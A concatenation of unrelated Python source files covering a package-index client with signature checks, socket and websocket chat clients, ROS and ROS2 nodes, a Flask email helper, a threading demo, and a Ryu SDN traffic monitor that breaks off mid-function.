('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
    def download_file(self, url, destfile, digest=None, reporthook=None):
        """
        This is a convenience method for downloading a file from an URL.
        Normally, this will be a file from the index, though currently
        no check is made for this (i.e. a file can be downloaded from
        anywhere).

        The method is just like the :func:`urlretrieve` function in the
        standard library, except that it allows digest computation to be
        done during download and checking that the downloaded data
        matched any expected value.

        :param url: The URL of the file to be downloaded (assumed to be
                    available via an HTTP GET request).
        :param destfile: The pathname where the downloaded file is to be
                         saved.
        :param digest: If specified, this must be a (hasher, value)
                       tuple, where hasher is the algorithm used (e.g.
                       ``'md5'``) and ``value`` is the expected value.
        :param reporthook: The same as for :func:`urlretrieve` in the
                           standard library.
        :raises DistlibException: if fewer bytes than Content-Length arrive,
                                  or if the computed digest does not match.
        """
        if digest is None:
            digester = None
            logger.debug('No digest specified')
        else:
            # A bare string digest defaults to md5; otherwise the pair
            # names the hashlib algorithm explicitly.
            if isinstance(digest, (list, tuple)):
                hasher, digest = digest
            else:
                hasher = 'md5'
            digester = getattr(hashlib, hasher)()
            logger.debug('Digest specified: %s' % digest)
        # The following code is equivalent to urlretrieve.
        # We need to do it this way so that we can compute the
        # digest of the file as we go.
        with open(destfile, 'wb') as dfp:
            # addinfourl is not a context manager on 2.x
            # so we have to use try/finally
            sfp = self.send_request(Request(url))
            try:
                headers = sfp.info()
                blocksize = 8192
                size = -1
                read = 0
                blocknum = 0
                if "content-length" in headers:
                    size = int(headers["Content-Length"])
                if reporthook:
                    # Initial call, mirroring urlretrieve's behaviour.
                    reporthook(blocknum, blocksize, size)
                while True:
                    block = sfp.read(blocksize)
                    if not block:
                        break
                    read += len(block)
                    dfp.write(block)
                    if digester:
                        digester.update(block)
                    blocknum += 1
                    if reporthook:
                        reporthook(blocknum, blocksize, size)
            finally:
                sfp.close()

        # check that we got the whole file, if we can
        if size >= 0 and read < size:
            raise DistlibException(
                'retrieval incomplete: got only %d out of %d bytes'
                % (read, size))
        # if we have a digest, it must match.
        if digester:
            actual = digester.hexdigest()
            if digest != actual:
                raise DistlibException('%s digest mismatch for %s: expected '
                                       '%s, got %s' % (hasher, destfile,
                                                       digest, actual))
            logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
if self.rpc_proxy is None:
self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
return self.rpc_proxy.search(terms, operator or 'and')
|
bridgeClient.py | #! /usr/bin/python
import socket
import threading
from time import sleep
import sys
import pygame
class bridgeConnection():
    # Python 2 client that keeps a TCP connection to the bridge server and
    # sorts incoming messages by length into command/grid/turn buckets.

    def __init__(self):
        #self.HOST = raw_input("HOST IP : ")
        self.HOST = "143.248.12.189"
        self.PORT = 50000
        self.DATA_SIZE = 128 # maximum data length which can be sent in once
        self.endThread = False
        self.makeConnection()
        self.dataList = {'cmd':[],'grid':[], 'turn':[]} #Sort the type of the data
        # makeConnection sets self.soc to False on failure.
        if not self.soc:
            print "Server is not opened"
        """ for test """
        #else:
            #while 1:
                #msg = raw_input("send data : ")
                #self.sendData(msg)
                #if msg == "quit" or msg == "exit":
                    #self.endThread = True
                    #break

    def makeConnection(self):
        # make socket and connect to the server
        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        soc.settimeout(5.0) # maximum wating time (seconds)
        connected = False
        while not connected:
            try:
                print "trying to connect " + self.HOST
                soc.connect( (self.HOST, self.PORT) )
                connected = True
                print "Connected!"
                #soc.settimeout(None)
                break
            except socket.timeout:
                print "Exceeded time limit"
                connectAgain = raw_input("try again?(y/n)")
                if connectAgain == "y" or connectAgain == "Y":
                    continue
                else:
                    # NOTE(review): returning here leaves self.soc unset, so
                    # __init__'s `if not self.soc` would raise AttributeError
                    # — confirm this path is intended.
                    return
            except socket.error:
                print "Access denied"
                sleep(1)
                # [ NOT YET ] if QUIT command is received, call 'sys.exit'
                # Connection refused: report failure to __init__ via a
                # falsy self.soc.
                self.soc = False
                return
        self.soc = soc
        # Threading allows to get data whenever it's delievered
        self.T = threading.Thread(target = self.receiveData)
        self.T.start()

    def sendData(self, data):
        """ Send data (string type) to the server """
        if len(data) <= self.DATA_SIZE:
            self.soc.send(data.encode('UTF-8'))
            print "Data '%s' is sent successfully" %data
        else:
            print "Data packet size exceeded!"

    def receiveData(self):
        """ Receive data (string type) from the server """
        # Runs on the background thread started by makeConnection; exits
        # when endThread is set or the connection drops.
        while not self.endThread:
            try:
                data = self.soc.recv(self.DATA_SIZE) # receive data whose length <= DATA_SIZE
                print "data is : %s" %data
            except socket.timeout:
                #print "socket timed out"
                continue
            except:
                # NOTE(review): bare except — also swallows KeyboardInterrupt
                # and SystemExit on this thread.
                print "Connection is lost"
                break
            # Messages are classified purely by payload length:
            # >3 bytes = command, <3 bytes = grid, exactly 3 = turn.
            if len(data)>3:
                self.dataList['cmd'].append(data) # save the received data
            elif len(data)<3:
                self.dataList['grid'].append(data)
            else:
                self.dataList['turn'].append(data)
        self.soc.close() # disconnect the connection

    def disconnect(self):
        # Stop the receiver thread, tear down pygame and exit the process.
        self.endThread = True
        print "joining the thread..."
        self.T.join()
        print "thread is joined"
        pygame.quit()
        sys.exit()
'''
class userInterfaceWindow():
def __init__(self, screen):
self.screen = screen
self.clients = []
def a():
pass
'''
if __name__ == "__main__":
    # Smoke test: connect, stay alive for a while, then tear down
    # (disconnect calls sys.exit).
    client = bridgeConnection()
    print "end session"
    sleep(15)
    client.disconnect()
|
client.py | import asyncio
from threading import Thread
import websocket
import modules.logger as logger
import modules.message as message_module
logger = logger.get_logger(__name__)
connected = False
def send_message(websocket, msg):
    """Pack *msg* into a Message and send it over *websocket*.

    An empty string is ignored. '/end' sends a CONNECTION_CLOSE message
    and shuts the socket down.
    """
    if msg == '':
        return
    # NOTE(review): '/setname' currently receives the same TEXT treatment
    # as any other message; the original branch looked like a placeholder.
    kind = 'CONNECTION_CLOSE' if msg == '/end' else 'TEXT'
    message = message_module.Message(kind, msg)
    websocket.send(message.pack())
    if message.message_type == 'CONNECTION_CLOSE':
        print('Connection closed, press enter to continue.')
        websocket.close()
def on_message(websocket, packed_response):
    """websocket-client message callback: log TEXT/STATUS payloads."""
    if packed_response is None:
        return
    response = message_module.Message.from_packed(packed_response)
    # Both TEXT and STATUS messages are simply surfaced through the logger.
    if response.message_type in ('TEXT', 'STATUS'):
        logger.info(response.data)
def on_open(websocket):
    """websocket-client open callback: mark the link live and greet."""
    global connected
    connected = True
    # Announce ourselves so the server registers this client.
    websocket.send(message_module.Message('HELLO', "").pack())
def on_error(websocket, error_msg):
    """websocket-client error callback: record the error."""
    logger.error(error_msg)
def on_close(websocket):
    """websocket-client close callback: flag the connection as gone."""
    global connected
    connected = False
    # NOTE(review): raising here looks like a placeholder; the exception
    # surfaces inside websocket-client's run_forever loop — confirm the
    # intended shutdown behaviour.
    raise Exception('websocket closed, do something')
def game_thread(app):
    """Forward stdin lines to the server until the connection drops."""
    while True:
        line = input()
        if not connected:
            # The connection died while we were blocked on input().
            break
        try:
            send_message(app, line)
        except websocket._exceptions.WebSocketConnectionClosedException:
            logger.info('Connection is closed')
            break
def run(ip, port):
    """Connect to ws://ip:port and run the socket and stdin loops."""
    app = websocket.WebSocketApp(
        f'ws://{ip}:{port}',
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
        on_open=on_open,
    )
    # One thread drives the websocket event loop, the other reads stdin.
    workers = [
        Thread(target=app.run_forever),
        Thread(target=game_thread, args=(app,)),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
|
broadcast_handler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
########################################################################
#
# Copyright (c) 2016 Baidu.com, Inc. All Rights Reserved
#
########################################################################
"""
File: broadcast_manager.py
Author: haifeng(haifeng@baidu.com)
Date: 2016/11/30 19:23:31
"""
import os
import json
import time
import socket
import struct
import decimal
import logging
import traceback
import threading
import functools
import rospy.core
from rospy.core import signal_shutdown
from rospy.impl.registration import Registration
from rospy.impl.registration import get_topic_manager
from rospy.impl.registration import get_service_manager
from rospy.impl.registration import get_node_handler
from rosgraph.network import parse_http_host_and_port,get_host_name
import sys
# Extend sys.path with LD_LIBRARY_PATH entries so the native participant
# extension (imported just below) can be found.
env = os.environ.get('LD_LIBRARY_PATH')
# BUG FIX: previously env.split(':') raised AttributeError when the
# variable was unset (os.environ.get returns None).
if env:
    for sub_path in env.split(':'):
        sys.path.append(sub_path)
from rospy.impl import participant
REQUEST_TYPE = 'request_type'
NODE_NAME = 'node_name'
XMLRPC_URI = 'xmlrpc_uri'
TIMESTAMP = 'timestamp'
NODE_TIME = "node_time"
TOPIC_NAME = "topic_name"
TOPIC_TYPE = "topic_type"
TOPIC_URI = "topic_uri"
SERVICE_NAME = "service_name"
SERVICE_TYPE = "service_type"
SERVICE_URI = "service_uri"
class Singleton(type):
    """Metaclass caching one shared instance per class.

    The arguments of the first instantiation win; subsequent calls return
    the cached instance and ignore their arguments.
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        try:
            return cls._instances[cls]
        except KeyError:
            instance = super(Singleton, cls).__call__(*args, **kwargs)
            cls._instances[cls] = instance
            return instance
class BroadcastHandler(object):
    """
    Bridges participant broadcast messages to the ROS master handler.

    A background daemon thread reads JSON messages from a
    participant.Participant and dispatches each one to the matching
    '_<request_type>Callback' method, which forwards the registration
    change to the wrapped master handler.
    """
    # NOTE(review): '__metaclass__' only takes effect on Python 2; under
    # Python 3 this class would silently stop being a singleton.
    __metaclass__ = Singleton
    def __init__(self, handler):
        """
        Create the participant and start the background dispatch thread.

        :param handler: master handler exposing registerPublisher,
            unregisterPublisher, registerSubscriber, unregisterSubscriber,
            registerService and unregisterService.
        """
        super(BroadcastHandler, self).__init__()
        self._logger = logging.getLogger(__name__)
        self._logger.setLevel(logging.INFO)
        # Whitelist of request types that may be dispatched; each entry maps
        # to a method named '_<request_type>Callback'.
        # NOTE(review): lookupService/getTopicTypes/lookupNode have no
        # corresponding callback methods below, so dispatching them raises
        # AttributeError (caught and logged by run()).
        self.callback = ["registerPublisher",
                         "unregisterPublisher",
                         "registerSubscriber",
                         "unregisterSubscriber",
                         "registerService",
                         "unregisterService",
                         "lookupService",
                         "getTopicTypes",
                         "lookupNode",
                         ]
        self._handler = handler
        self._name = "rosmaster"
        self._participant = participant.Participant(self._name)
        self._participant.init_py()
        # Daemon thread so it never blocks interpreter shutdown.
        self._broardcast_manager_thread = threading.Thread(
            target=self.run, args=())
        self._broardcast_manager_thread.setDaemon(True)
        self._broardcast_manager_thread.start()
    def run(self):
        """
        Dispatch loop: read, decode and route broadcast messages forever.

        Any per-message failure is logged and the loop keeps running.
        """
        self._logger.debug("starting broadcast_manager!")
        while True:
            try:
                msg = self._participant.read_msg()
                if msg is None:
                    continue
                if(len(msg) > 0):
                    data = self._unpack_msg(msg.strip())
                    self._logger.debug("recv data: %s " % data)
                    if data[REQUEST_TYPE] in self.callback:
                        # Route to the '_<request_type>Callback' method.
                        cb = '_' + data[REQUEST_TYPE] + "Callback"
                        func = getattr(self, cb)
                        func(data)
                        pass
                    else:
                        self._logger.error("[broadcast_handler] invalid request type: %s" % data[REQUEST_TYPE])
                else:
                    # Empty message: back off briefly to avoid busy-waiting.
                    time.sleep(0.005)
            except Exception as e:
                # Keep the dispatch thread alive on any failure.
                self._logger.error("broadcast_manager thread error is %s" % e)
                print("broadcast_manager thread error is %s" % e)
            finally:
                pass
    def getUri(self, caller_id):
        """
        Return (code, message, uri) of this server.

        NOTE(review): self._uri is never assigned in this class, so calling
        this raises AttributeError — confirm where _uri is meant to be set.
        """
        return 1, "", self._uri
    def getPid(self, caller_id):
        """
        Return (code, message, pid) with the PID of this server process.
        """
        return 1, "", os.getpid()
    def _registerPublisherCallback(self, data):
        # Forward a publisher registration to the master handler.
        name = data[NODE_NAME]
        topic = data[TOPIC_NAME]
        datatype = data[TOPIC_TYPE]
        uri = data[XMLRPC_URI]
        self._handler.registerPublisher(name, topic, datatype, uri)
    def _unregisterPublisherCallback(self, data):
        # Forward a publisher removal to the master handler.
        name = data[NODE_NAME]
        topic = data[TOPIC_NAME]
        uri = data[XMLRPC_URI]
        self._handler.unregisterPublisher(name, topic, uri)
    def _registerSubscriberCallback(self, data):
        # Forward a subscriber registration to the master handler.
        name = data[NODE_NAME]
        topic = data[TOPIC_NAME]
        datatype = data[TOPIC_TYPE]
        uri = data[XMLRPC_URI]
        self._handler.registerSubscriber(name, topic, datatype, uri)
    def _unregisterSubscriberCallback(self, data):
        # Forward a subscriber removal to the master handler.
        name = data[NODE_NAME]
        topic = data[TOPIC_NAME]
        uri = data[XMLRPC_URI]
        self._handler.unregisterSubscriber(name, topic, uri)
    def _registerServiceCallback(self, data):
        # Forward a service registration to the master handler.
        name = data[NODE_NAME]
        service_name = data[SERVICE_NAME]
        service_uri = data[SERVICE_URI]
        uri = data[XMLRPC_URI]
        self._handler.registerService(name, service_name, service_uri, uri)
    def _unregisterServiceCallback(self, data):
        # Forward a service removal to the master handler.
        name = data[NODE_NAME]
        service_name = data[SERVICE_NAME]
        service_uri = data[SERVICE_URI]
        self._handler.unregisterService(name, service_name, service_uri)
    def _send(self, data):
        """
        Send *data* through the participant.
        """
        self._participant.send(data)
    def _recv(self, size=1024):
        """
        Receive up to *size* bytes; return (msg, addr), both None on error.

        NOTE(review): self._sock is never assigned in this class, so this
        always logs an error and returns (None, None) as written.
        """
        msg = addr = None
        try:
            msg, addr = self._sock.recvfrom(size)
        except Exception as e:
            self._logger.error("socket recv error is %s" % e)
            self._logger.error(traceback.format_exc())
        finally:
            pass
        return msg, addr
    def _unpack_msg(self, msg):
        # Decode a JSON payload into a dict.
        data = json.loads(msg)
        return data
    def _pack_msg(self, data):
        # Encode a dict as a JSON payload.
        return json.dumps(data)
|
Barrier_studikasus.py | from random import randrange
from threading import Barrier, Thread
from time import ctime, sleep
# Number of travelers; the barrier trips once all of them have arrived.
jmlh_org = 3
# "Destination city": the barrier every traveler waits at.
kota_tujuan = Barrier(jmlh_org)
# Traveler names, consumed by pop() — one per thread.
orangmudik = ['Asep Gokil', 'Udin Wazowski', 'Papope Cool']
def mudik():
    """One traveler: take a name, travel for a random 2-4s, then wait at the barrier."""
    name = orangmudik.pop()
    travel_time = randrange(2, 5)  # random travel duration in seconds
    sleep(travel_time)
    arrival_msg = '%s Sampai Ke Kota pada hari: %s \n' % (name, ctime())
    print(arrival_msg)
    kota_tujuan.wait()  # block until every traveler has arrived
def main():
    """Spawn one thread per traveler and wait until all have arrived."""
    print('Mudik Dilaksanakan')
    workers = []
    for _ in range(jmlh_org):
        worker = Thread(target=mudik)
        workers.append(worker)
        worker.start()
    # Wait for every traveler thread to finish.
    for worker in workers:
        worker.join()
    print('Alhamdulillah, sampai ditempat tujuan dengan selamat')
if __name__ == "__main__":
    main()
|
talker.py | import rclpy
import os
import pyvcroid2
import simpleaudio
import winsound
import threading
from ctypes import *
from rclpy.node import Node
import std_msgs.msg
from rcl_interfaces.msg import ParameterType
from rcl_interfaces.msg import SetParametersResult
# Talker node
# Talker node
class TalkerNode(Node):
    """ROS2 node that synthesizes incoming text with VOICEROID2.

    Depending on parameters, the synthesized audio is either played on the
    local machine (winsound or simpleaudio) or published as a
    ByteMultiArray topic for another node to consume.
    """
    def __init__(self):
        """Load the VOICEROID2 engine, dictionaries and node settings.

        Raises whatever pyvcroid2 raises when the engine, language or
        voice library cannot be loaded.
        """
        super().__init__('voiceroid2')
        try:
            # Initialize pyvcroid2
            self.vc = pyvcroid2.VcRoid2()
            # Load language library
            language_name = self.declare_parameter("language", "standard").value
            self.vc.loadLanguage(language_name)
            self.get_logger().info("Language library '{0}' was loaded".format(language_name))
            # Load voice library
            voice_list = self.vc.listVoices()
            if len(voice_list) == 0:
                raise Exception("No voice library")
            voice_name = self.declare_parameter("voice", voice_list[0]).value
            self.vc.loadVoice(voice_name)
            self.get_logger().info("Voice library '{0}' was loaded".format(voice_name))
            # Load dictionaries: resolve the user's Documents folder via
            # SHGetKnownFolderPath (the GUID bytes below), where VOICEROID2
            # stores its user dictionaries.
            rfid = c_char_p(b"\xD0\x9A\xD3\xFD\x8F\x23\xAF\x46\xAD\xB4\x6C\x85\x48\x03\x69\xC7")
            pwstr = c_wchar_p()
            windll.shell32.SHGetKnownFolderPath(rfid, c_uint32(0), c_void_p(), byref(pwstr))
            documents_path = wstring_at(pwstr)
            windll.ole32.CoTaskMemFree(pwstr)
            default_pdic_path = documents_path + "\\VOICEROID2\\フレーズ辞書\\user.pdic"
            default_wdic_path = documents_path + "\\VOICEROID2\\単語辞書\\user.wdic"
            default_sdic_path = documents_path + "\\VOICEROID2\\記号ポーズ辞書\\user.sdic"
            pdic_path = self.declare_parameter("phrase_dictionary", default_pdic_path).value
            wdic_path = self.declare_parameter("word_dictionary", default_wdic_path).value
            sdic_path = self.declare_parameter("symbol_dictionary", default_sdic_path).value
            # Load each dictionary when explicitly configured, or when the
            # default file actually exists on disk.
            if (pdic_path != default_pdic_path) or os.path.isfile(pdic_path):
                self.vc.reloadPhraseDictionary(pdic_path)
                self.get_logger().info("Phrase dictionary '{0}' was loaded".format(pdic_path))
            if (wdic_path != default_wdic_path) or os.path.isfile(wdic_path):
                self.vc.reloadWordDictionary(wdic_path)
                self.get_logger().info("Word dictionary '{0}' was loaded".format(wdic_path))
            if (sdic_path != default_sdic_path) or os.path.isfile(sdic_path):
                self.vc.reloadSymbolDictionary(sdic_path)
                self.get_logger().info("Symbol dictionary '{0}' was loaded".format(sdic_path))
        except Exception as e:
            # BUG FIX: rclpy loggers require a str message; passing the
            # exception object raised a TypeError that masked the real
            # error. Bare `raise` also preserves the original traceback.
            self.get_logger().error(str(e))
            raise
        # Load settings
        subscribe_topic_name = self.declare_parameter("subscribe_topic_name", "text").value
        # NOTE(review): declaring a parameter with a None default may be
        # rejected by newer rclpy versions (type cannot be inferred) —
        # confirm against the target ROS2 distribution.
        publish_topic_name = self.declare_parameter("publish_topic_name", None).value
        # play_mode: "wait" = blocking winsound, "overlap" = concurrent
        # simpleaudio, anything else = stop current playback first.
        play_mode = self.declare_parameter("play_mode", "stop").value
        if play_mode == "wait":
            self.stop_before_play = False
            self.use_winsound = True
        elif play_mode == "overlap":
            self.stop_before_play = False
            self.use_winsound = False
        else:
            self.stop_before_play = True
            self.use_winsound = False
        # Initialize node
        self.subscription = self.create_subscription(
            std_msgs.msg.String,
            subscribe_topic_name,
            self.text_callback,
            10)
        if publish_topic_name is not None:
            self.publisher = self.create_publisher(std_msgs.msg.ByteMultiArray, publish_topic_name, 10)
            self.get_logger().info("Speech data will be published as topic '{0}'".format(publish_topic_name))
        else:
            self.publisher = None
            self.get_logger().info("Speech data will be played by local computer")
        self.add_on_set_parameters_callback(self.parameter_callback)
    def text_callback(self, msg):
        """Synthesize the received text and play or publish the audio."""
        text = msg.data
        try:
            # raw PCM only when playing via simpleaudio locally; winsound
            # and publishing need the full WAV container.
            speech, _ = self.vc.textToSpeech(text, raw = (self.publisher is None) and (not self.use_winsound))
        except Exception as e:
            self.get_logger().warn(str(e))
            return
        if self.publisher is None:
            # Play sound in a worker thread so the callback returns quickly.
            t = threading.Thread(target=self.play_sound, args=(speech,))
            t.start()
        else:
            # Publish sound data
            msg = std_msgs.msg.ByteMultiArray()
            msg.data = [speech]
            self.publisher.publish(msg)
    def parameter_callback(self, params):
        """Accept every runtime parameter update (no validation yet)."""
        for param in params:
            pass
        return SetParametersResult(successful=True)
    def play_sound(self, speech):
        """Play one utterance according to the configured play mode."""
        if self.use_winsound:
            # play_mode == "wait": blocking playback of the WAV blob.
            winsound.PlaySound(speech, winsound.SND_MEMORY)
        else:
            if self.stop_before_play:
                # play_mode == "stop": cut off any ongoing playback first.
                simpleaudio.stop_all()
            # play_mode == "overlap" just plays concurrently.
            # Raw PCM: mono, 16-bit samples, 44.1 kHz.
            obj = simpleaudio.play_buffer(speech, 1, 2, 44100)
            obj.wait_done()
def main(args=None):
    """Entry point: spin the talker node until shutdown.

    The node and the rclpy context are released in a finally block so
    cleanup still happens when spin raises (e.g. KeyboardInterrupt) —
    the original skipped cleanup on any exception.
    """
    rclpy.init(args=args)
    node = TalkerNode()
    try:
        rclpy.spin(node)
    finally:
        node.destroy_node()
        rclpy.shutdown()
if __name__ == '__main__':
    main()
|
email.py | from threading import Thread
from flask import render_template
from flask_mail import Message
from app import app, mail
def send_async_email(app, msg):
    """Deliver *msg* via Flask-Mail inside *app*'s application context.

    Meant to run on a background thread, where no request context exists.
    """
    with app.app_context():
        mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
    """Compose a plain-text + HTML email and send it on a background thread."""
    msg = Message(subject, sender=sender, recipients=recipients)
    msg.body = text_body
    msg.html = html_body
    worker = Thread(target=send_async_email, args=(app, msg))
    worker.start()
def send_password_reset_email(user):
    """Email *user* a password-reset link containing a signed token."""
    token = user.get_reset_password_token()
    text_body = render_template('email/reset_password.txt',
                                user=user, token=token)
    html_body = render_template('email/reset_password.html',
                                user=user, token=token)
    send_email('[NH High Peaks] Reset Your Password',
               sender=app.config['ADMINS'][0],
               recipients=[user.email],
               text_body=text_body,
               html_body=html_body)
network_monitor_GA.py | # Copyright (C) 2016 Huang MaChi at Chongqing University
# of Posts and Telecommunications, Chongqing, China.
# Copyright (C) 2016 Li Cheng at Beijing University of Posts
# and Telecommunications. www.muzixing.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
import copy
import time
from operator import attrgetter
# import GA_compute
from ryu import cfg
from ryu.base import app_manager
from ryu.base.app_manager import lookup_service_brick
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, DEAD_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import hub
from DemandEstimation import demand_estimation
from GA_test import GaProcessor
import setting
from ryu.lib.packet import ethernet
# import PureSDN2 as sf
CONF = cfg.CONF  # Ryu global configuration; CONF.weight selects the routing weight ('bw' / 'hop').
class NetworkMonitor(app_manager.RyuApp):
"""
NetworkMonitor is a Ryu app for collecting traffic information.
"""
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
    def __init__(self, *args, **kwargs):
        """
        Initialize all statistics containers and start the monitor thread.
        """
        super(NetworkMonitor, self).__init__(*args, **kwargs)
        self.name = 'monitor'
        # Connected switches: {dpid: datapath}
        self.datapaths = {}
        # Raw samples and derived rates, keyed per dpid/port or flow.
        self.port_stats = {}
        self.port_speed = {}
        self.flow_stats = {}
        self.pre_GFF_path = {}
        self.flow_speed = {}
        self.stats = {}
        self.flow_index = []
        self.select = {}
        # Set True when any port's free bandwidth drops to zero.
        self.congested=False
        self.flows_len = 0
        # Flows considered for rescheduling in the current poll cycle.
        self.flows = {}
        self.traffics={}
        self.hostsList = []
        # {dpid: {port_no: (config, state, curr_speed, max_speed)}}
        self.port_features = {}
        self.free_bandwidth = {}   # self.free_bandwidth = {dpid:{port_no:free_bw,},} unit:Kbit/s
        self.link_dropped={}
        self.link_errors={}
        # Per-link metrics fed into the topology graph by create_graph().
        self.link_info={'bandwidth':{},'loss':{},'errors':{}}
        self.current_free_bandwidth={}
        # Topology-awareness sibling Ryu app (may be None until it starts).
        self.awareness = lookup_service_brick('awareness')
        # self.shortest_forwarding = lookup_service_brick('shortest_forwarding')
        self.graph = None
        self.capabilities = None
        self.best_paths = None
        self.k=0
        self.gp = GaProcessor()
        # Start to green thread to monitor traffic and calculating
        # free bandwidth of links respectively.
        self.monitor_thread = hub.spawn(self._monitor)
        self.paths={}
    def _monitor(self):
        """
        Main entry method of monitoring traffic.

        Each cycle: reset per-cycle state, poll every known datapath for
        stats, refresh the metric-annotated graph, then sleep for
        MONITOR_PERIOD so the asynchronous stat replies can arrive before
        they are displayed.
        """
        while CONF.weight == 'bw' or CONF.weight=='hop':
            self.stats['flow'] = {}
            self.stats['port'] = {}
            # dpids whose flow-stat replies arrived this cycle
            # (first assigned here, not in __init__).
            self.statRecord = []
            self.flows = {}
            # self.traffics={}
            self.congested=False
            for dp in self.datapaths.values():
                self.port_features.setdefault(dp.id, {})
                self._request_stats(dp)
            # Refresh data.
            self.create_graph(self.link_info)
            self.capabilities = None
            self.best_paths = None
            hub.sleep(setting.MONITOR_PERIOD)
            if self.stats['flow'] or self.stats['port']:
                self.show_stat('flow')
                self.show_stat('port')
                hub.sleep(1)
    def _save_bw_graph(self):
        """
        Save bandwidth data into networkx graph object.

        Periodically stamps every edge with the static MAX_CAPACITY value
        (see create_static_bw_graph). Runs only while a bandwidth-aware
        weight is configured.
        """
        while CONF.weight == 'bw' or CONF.weight=='hop':
            # self.graph = self.create_bw_graph(self.free_bandwidth)
            self.create_static_bw_graph()
            self.logger.debug("save free bandwidth")
            #self.show_topology()
            hub.sleep(setting.MONITOR_PERIOD)
@set_ev_cls(ofp_event.EventOFPStateChange,
[MAIN_DISPATCHER, DEAD_DISPATCHER])
def _state_change_handler(self, ev):
"""
Record datapath information.
"""
datapath = ev.datapath
if ev.state == MAIN_DISPATCHER:
if not datapath.id in self.datapaths:
self.logger.debug('register datapath: %016x', datapath.id)
self.datapaths[datapath.id] = datapath
elif ev.state == DEAD_DISPATCHER:
if datapath.id in self.datapaths:
self.logger.debug('unregister datapath: %016x', datapath.id)
del self.datapaths[datapath.id]
else:
pass
    @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER)
    def _flow_stats_reply_handler(self, ev):
        """
        Save flow stats reply information into self.flow_stats.
        Calculate flow speed and Save it.
        (old) self.flow_stats = {dpid:{(in_port, ipv4_dst, out-port):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
        (old) self.flow_speed = {dpid:{(in_port, ipv4_dst, out-port):[speed,],},}
        (new) self.flow_stats = {dpid:{(priority, ipv4_src, ipv4_dst):[(packet_count, byte_count, duration_sec, duration_nsec),],},}
        (new) self.flow_speed = {dpid:{(priority, ipv4_src, ipv4_dst):[speed,],},}
        Because the proactive flow entrys don't have 'in_port' and 'out-port' field.
        Note: table-miss, LLDP and ARP flow entries are not what we need, just filter them.
        """
        body = ev.msg.body
        dpid = ev.msg.datapath.id
        self.statRecord.append(dpid)
        self.stats['flow'][dpid] = body
        self.flow_stats.setdefault(dpid, {})
        self.flow_speed.setdefault(dpid, {})
        for stat in sorted([flow for flow in body if (
            (flow.priority not in [0, 25, 65535]) and (flow.match.get('ipv4_src')) and (flow.match.get('ipv4_dst')))],
            key=lambda flow: (flow.priority, flow.match.get('ipv4_src'), flow.match.get('ipv4_dst'))):
            src = stat.match['ipv4_src']
            dst = stat.match['ipv4_dst']
            # NOTE(review): self.newComingFlows is never initialized in this
            # file, so this loop raises AttributeError unless another
            # component sets it. Also f[(src, dst)] indexes f with a tuple
            # while f[0]/f[1] are positional — confirm the element type.
            for f in self.newComingFlows:
                if f[0]==src and f[1]==dst:
